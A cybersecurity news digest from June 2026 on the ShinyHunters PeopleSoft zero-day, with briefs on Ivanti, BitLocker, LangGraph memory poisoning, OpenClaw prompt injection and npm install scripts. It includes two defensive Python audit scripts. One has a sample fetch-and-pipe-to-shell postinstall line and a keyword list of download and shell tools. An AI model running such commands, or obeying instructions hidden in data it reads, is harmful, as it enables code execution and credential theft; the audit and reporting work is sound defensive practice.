
Friday 12 June 2026

ShinyHunters' Oracle PeopleSoft Zero-Day: 100+ Orgs Breached Before a Patch Existed

ShinyHunters exploited a silent Oracle PeopleSoft zero-day for two weeks before Oracle even knew it was public, hitting 100+ organisations — and Australia's government just quietly signalled it wants telcos and cloud providers to start blocking threats upstream.

Lead story

For thirteen days, ShinyHunters had a weapon Oracle didn't know was loaded. The extortion group exploited CVE-2026-35273 — a critical, unauthenticated remote code execution flaw in Oracle PeopleSoft — between May 27 and June 9, breaching more than 100 organisations before Oracle published any advisory. The patch arrived on June 10. By then, the damage was done.

Google's Mandiant team, which tracks ShinyHunters as UNC6240, confirmed the attribution and notified over 100 potentially affected organisations that had internet-exposed PeopleSoft servers. The University of Nottingham is the first confirmed victim to go public, with records on more than 450,000 current students and alumni now leaked. ShinyHunters told The Register there are many more to come.

Why PeopleSoft? It's the kind of target that looks boring from the outside but is a data goldmine within. Universities, hospitals, government agencies, and large enterprises run PeopleSoft for HR, finance, and student administration. Pull the thread and you get payroll records, tax file numbers, health data, academic transcripts — the full stack of sensitive personal information. It's also notoriously hard to patch quickly because of deep customisation and integration dependencies. Attackers know this.

The two-week exploitation window before disclosure is the most troubling part of this story. Oracle's standard patch cycle — quarterly Critical Patch Updates — was never designed for a world where threat actors can find and weaponise a zero-day faster than a vendor can issue guidance. The gap between "exploited in the wild" and "patch available" is exactly where the most damage happens.

What defenders should do right now. Oracle has released mitigations short of a full patch. If you run an internet-facing PeopleSoft instance, apply those mitigations immediately, audit access logs from May 27 onwards for anomalous activity, and treat any unexplained data exports as a potential indicator of compromise. Mandiant's IOCs from the UNC6240 campaign are publicly available.
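A starting point for that log review, as an added example (this is not Oracle's or Mandiant's tooling and is not something the page provides): it assumes the PeopleSoft web tier writes Combined Log Format, that the application lives under the usual /psp/, /psc/ and /psreports/ servlet prefixes, and that the byte thresholds and sample lines are constructed placeholders to tune for your site.

```python
"""Triage a PeopleSoft web-tier access log over the exploitation window the story
gives (27 May 2026 onwards). Constructed example; thresholds are assumptions."""
import re
from collections import defaultdict
from datetime import datetime, timezone

WINDOW_START = datetime(2026, 5, 27, tzinfo=timezone.utc)
EXPORT_BYTES = 5_000_000         # one response this large is "export-sized" (assumed)
PER_SOURCE_BYTES = 20_000_000    # aggregate bytes per source IP in the window (assumed)
PS_PATHS = ("/psp/", "/psc/", "/psreports/")  # adjust to your PIA site name

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse_line(line):
    """Parse one Combined Log Format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {"ip": m["ip"], "method": m["method"], "path": m["path"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "status": int(m["status"]),
            "size": 0 if m["size"] == "-" else int(m["size"])}

def triage(lines):
    """Return (kind, ip, path, bytes) findings for PeopleSoft requests inside the window."""
    findings, per_ip = [], defaultdict(int)
    for raw in lines:
        rec = parse_line(raw)
        if rec is None or rec["ts"] < WINDOW_START or not rec["path"].startswith(PS_PATHS):
            continue
        per_ip[rec["ip"]] += rec["size"]
        if rec["status"] == 200 and rec["size"] >= EXPORT_BYTES:
            findings.append(("export_sized_response", rec["ip"], rec["path"], rec["size"]))
    for ip, total in per_ip.items():
        if total >= PER_SOURCE_BYTES:
            findings.append(("high_volume_source", ip, None, total))
    return findings

# Constructed sample lines (RFC 5737 test addresses); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/May/2026:22:10:01 +0000] "GET /psp/ps/EMPLOYEE/HRMS/h/?tab=DEFAULT HTTP/1.1" 200 7000000',
    '198.51.100.9 - - [28/May/2026:03:14:22 +0000] "GET /psc/ps/EMPLOYEE/HRMS/c/ROLE_EMPLOYEE.HR_EE_PERS_INFO.GBL HTTP/1.1" 200 48213',
    '198.51.100.9 - - [28/May/2026:03:15:40 +0000] "GET /psreports/ps/1/12345/report.csv HTTP/1.1" 200 6200000',
    '198.51.100.9 - - [28/May/2026:03:19:02 +0000] "GET /psreports/ps/1/12346/report.csv HTTP/1.1" 200 15000000',
    '192.0.2.44 - - [01/Jun/2026:11:00:00 +0000] "GET /psp/ps/signon.html HTTP/1.1" 200 3120',
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Anything the script surfaces still has to be reconciled against scheduled jobs and known reporting users; the script narrows the review, it does not replace Mandiant's published IOCs.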

For Australian organisations, the exposure is real. PeopleSoft is widely deployed across Australian universities, state government agencies, and large enterprises — many of which fall under the Privacy Act and, for critical infrastructure operators, the SOCI Act. A breach of HR or student data at this scale would trigger mandatory notification obligations under the Notifiable Data Breaches scheme. If your organisation uses PeopleSoft and hasn't already run an emergency log review, that conversation needs to happen today.

The bigger pattern. ShinyHunters are not a new name. The group has been behind some of the most consequential data theft operations of the past several years, repeatedly targeting enterprise platforms with known user bases and slow patch cycles. The combination of a genuinely novel zero-day, a high-value target class, and a double-extortion model — pay up or we publish — makes this campaign particularly dangerous. Expect more victim names to surface over the coming days.

Watch for: Oracle's full patch timeline, further victim disclosures, and whether any Australian universities or agencies appear in the next wave of ShinyHunters leaks.

Also today

Australia's Government Wants Telcos and Cloud Providers to Block Threats Upstream

The Australian government is exploring a significant shift in how cyber threats are neutralised — moving the defensive burden upstream to telcos and cloud operators rather than leaving it entirely to individual organisations. The proposal, flagged as a key action in the evolution of Australia's cyber strategy, would see providers like Telstra, Optus, and major cloud platforms actively filtering malicious traffic before it reaches end targets. It's a model with precedent in the UK's NCSC partnership with ISPs. The practical and legal complexity is substantial — questions of liability, privacy, and scope will need resolution — but the direction of travel is clear. For critical infrastructure operators already navigating SOCI Act obligations, this could eventually mean a meaningful baseline of protection they don't have to build themselves.

iTnews

OAIC Finds Optus Breached Privacy of 51,000 Customers in White Pages Case

After a marathon investigation, the Office of the Australian Information Commissioner has ruled that Optus interfered with the privacy of approximately 51,000 customers by disclosing their details in the White Pages directory without adequate consent. The case centres on opt-out processes that were found to be insufficient under the Privacy Act. It's a significant ruling that arrives as Australia is mid-way through broader Privacy Act reform — and it sends a clear signal that the OAIC is prepared to pursue large telcos over consent failures, not just data breach incidents. For any organisation relying on passive or opt-out consent models for third-party data sharing, this determination is worth reading carefully.

iTnews

Australia's Parliamentary Computer Network Gets Its Biggest-Ever Cyber Upgrade

The Federal Parliamentary Computer Network — the system underpinning the daily operations of Australia's parliament — is about to undergo what officials are calling its most significant upgrade, with cyber resilience listed as the primary driver. The timing is notable: the network was compromised by a nation-state actor in 2019, and the threat environment for legislative bodies has only intensified since. Details on scope and vendors remain limited, but the upgrade signals that parliament is finally treating its own infrastructure with the same urgency it expects of critical industry. For a network that carries sensitive committee deliberations, ministerial correspondence, and draft legislation, the stakes of getting this wrong are obvious.

iTnews

Ivanti Sentry Max-Severity Flaw Exploited Within 24 Hours of Disclosure

A maximum-severity vulnerability in Ivanti Sentry — the secure mobile gateway product used by enterprises to manage device access — was being actively exploited within a day of the patch dropping. The flaw allows unauthenticated attackers to execute code with root privileges on internet-exposed systems. Mandiant and others noted that attackers appeared to have pre-mapped Ivanti's asset landscape, suggesting the exploitation wasn't opportunistic — it was prepared. This is the third Ivanti product to see rapid post-disclosure exploitation this year. At some point, the pattern stops being bad luck and starts being a procurement conversation. Australian organisations running Ivanti Sentry should treat patching as an emergency, not routine maintenance.

Dark Reading

GreatXML: A Researcher Bypassed BitLocker in Four Hours Using Windows' Own Recovery Tools

A security researcher going by Chaotic Eclipse (also known as MSNightmare) has published a proof-of-concept exploit called GreatXML that bypasses Windows BitLocker encryption by abusing malformed XML files in the recovery partition. The twist: it exploits Microsoft Defender's offline scan feature to spawn a SYSTEM-level shell when a machine reboots in Recovery Mode. The researcher says the discovery took four hours and was accidental — which makes it more alarming, not less. BitLocker is the primary at-rest encryption mechanism for most Windows enterprise deployments. A local or physical attacker who can reach the recovery partition now has a plausible path to full disk access. Microsoft has not yet issued a patch.

SecurityWeek

From SQL Injection to RCE: How LangGraph's Memory Layer Became an Attack Surface

Check Point Research has published a detailed walkthrough of how SQL injection vulnerabilities in LangGraph's checkpointer — the persistence layer that gives AI agents memory across sessions — can be chained into full remote code execution. LangGraph is an extension of LangChain used to build stateful multi-agent systems, and it's widely deployed in enterprise AI workflows. The attack path is more significant than a typical SQLi finding because the checkpointer sits at the intersection of user input and agent execution. If an attacker can poison the memory layer, they can effectively reprogram what the agent does next. As AI agent frameworks proliferate, their persistence mechanisms are becoming a new class of attack surface that few security teams have tooling for.

Check Point Research

OpenClaw AI Agent Can Be Hijacked via Hidden Instructions in Contacts and Location Pins

Two independent research teams published findings this week showing that OpenClaw, a popular self-hosted AI agent, can be manipulated into executing attacker-controlled code or leaking sensitive data through seemingly ordinary inputs. Imperva embedded hidden instructions inside vCards and location pins that the agent silently acted on. Varonis built a separate test demonstrating credential exfiltration via the same mechanism. Neither attack required the victim to do anything suspicious. The findings are a concrete demonstration of the prompt injection problem at scale: when agents consume data from the real world — contacts, calendar entries, documents — every piece of that data is a potential instruction set. There is no patch for this class of vulnerability; it requires architectural mitigations at the agent design level.

The Hacker News

Google DeepMind Is Funding Research Into What Happens When Millions of AI Agents Collide

Google DeepMind is bankrolling research into a scenario that most AI safety discussions haven't seriously addressed yet: what happens when millions of autonomous AI agents — from different companies, with different objectives — start interacting with each other at scale. According to Rohin Shah, who leads DeepMind's AGI safety and alignment work, the mass deployment of agents that take actions without human oversight and can receive instructions from other agents creates emergent risks that no single agent's safety evaluation will catch. It's a coordination problem more than a capability problem. The concern is real: as agent frameworks become standard enterprise infrastructure, the interactions between them will increasingly happen faster than any human can monitor.

MIT Technology Review

SpaceX Prices Shares at $135 in History's Largest-Ever IPO

SpaceX has officially priced its shares at $135, making its public debut the largest IPO in history by total valuation. The listing caps years of private fundraising at sky-high valuations and hands Elon Musk's rocket company a public market debut that will be closely watched as a bellwether for the broader space economy. The timing is complicated by a separate lawsuit filed by a former xAI engineer alleging he was fired for raising safety concerns about Grok days before the IPO — and by Musk's public amplification of anti-immigration rhetoric amid riots in Belfast on the eve of the float. None of that appears to have dampened investor appetite, but the governance questions will follow the company into its new public chapter.

TechCrunch

GitHub to Turn Off npm Install Scripts by Default in npm 12

GitHub has announced that npm version 12 will disable install scripts by default — a significant change that targets one of the most reliable vectors for software supply chain attacks. Install scripts run automatically when a package is downloaded and have been exploited repeatedly to execute malicious code the moment a developer types `npm install`. Turning them off by default won't eliminate the risk, but it shifts the burden: developers will have to explicitly opt in to running scripts rather than having them fire silently. For defenders and platform teams, this is the kind of default-secure change that matters more than any number of advisory notices. The change is labelled a "breaking change," which means some legitimate packages will need to adapt.
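An added example (Python, not npm's or GitHub's code) of the inventory a platform team would want before that default lands: which packages in a tree declare install-time scripts, and which script bodies deserve a manual look before being allowed to run. The hook names are npm's real lifecycle events; the review keywords and the sample tree are assumptions.

```python
"""Audit node_modules for packages that declare npm install-time lifecycle
scripts. Added example, not npm's or GitHub's code; the keyword list is a
heuristic and the sample tree below is constructed."""
import json
import os

INSTALL_HOOKS = ("preinstall", "install", "postinstall")  # run on `npm install` of a dependency
# Script fragments worth a manual look before allowing the package to run code (assumed list)
REVIEW_KEYWORDS = ("curl ", "wget ", "node -e", "eval(", "base64", "powershell", "| sh", "| bash")

def install_scripts(pkg):
    """Return {hook: command} for install-time hooks in a parsed package.json."""
    scripts = pkg.get("scripts") or {}
    return {h: scripts[h] for h in INSTALL_HOOKS if h in scripts}

def review_flags(command):
    """Keywords from REVIEW_KEYWORDS that appear in a script body."""
    return [kw for kw in REVIEW_KEYWORDS if kw in command]

def audit(pkgs):
    """pkgs: iterable of (path, package.json dict). One finding per install hook."""
    findings = []
    for path, pkg in pkgs:
        for hook, cmd in install_scripts(pkg).items():
            findings.append({"name": pkg.get("name", "?"), "path": path, "hook": hook,
                             "command": cmd, "review": review_flags(cmd)})
    return findings

def walk_node_modules(root="node_modules"):
    """Yield (dir, package.json dict) for every package, nested ones included."""
    for dirpath, _dirs, files in os.walk(root):
        if "package.json" in files:
            try:
                with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as f:
                    yield dirpath, json.load(f)
            except (OSError, json.JSONDecodeError):
                continue

# Constructed sample tree; these are not real packages.
SAMPLE_TREE = [
    ("node_modules/pad-left-ish", {"name": "pad-left-ish", "scripts": {"test": "jest"}}),
    ("node_modules/native-thing", {"name": "native-thing", "scripts": {"install": "node-gyp rebuild"}}),
    ("node_modules/nested/node_modules/odd-pkg",
     {"name": "odd-pkg", "scripts": {"postinstall": "curl -s https://example.invalid/x | sh"}}),
]

if __name__ == "__main__":
    for finding in audit(walk_node_modules()):
        print(finding["name"], finding["hook"], finding["review"] or "ok")
```

Until npm 12 ships, `ignore-scripts=true` in a project's `.npmrc` gives the same default today; the audit tells you which packages (typically native builds) you would then need to rebuild deliberately.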

The Hacker News

South Korea Fines Coupang a Record $409 Million Over 37-Million-Customer Data Breach

South Korea's data protection regulator has issued e-commerce giant Coupang with a record fine of roughly $409 million USD following a breach affecting more than 37 million customers. The penalty dwarfs previous Korean enforcement actions and signals that Asia-Pacific regulators are increasingly willing to impose GDPR-scale consequences for data protection failures. For Australian observers, the comparison is instructive: the Privacy Act's current penalty cap — even post-reform — remains well below what regulators in Korea and the EU can now levy. The Coupang fine will almost certainly be cited in ongoing Australian debates about whether the penalty framework is strong enough to drive meaningful investment in data security.

Bleeping Computer
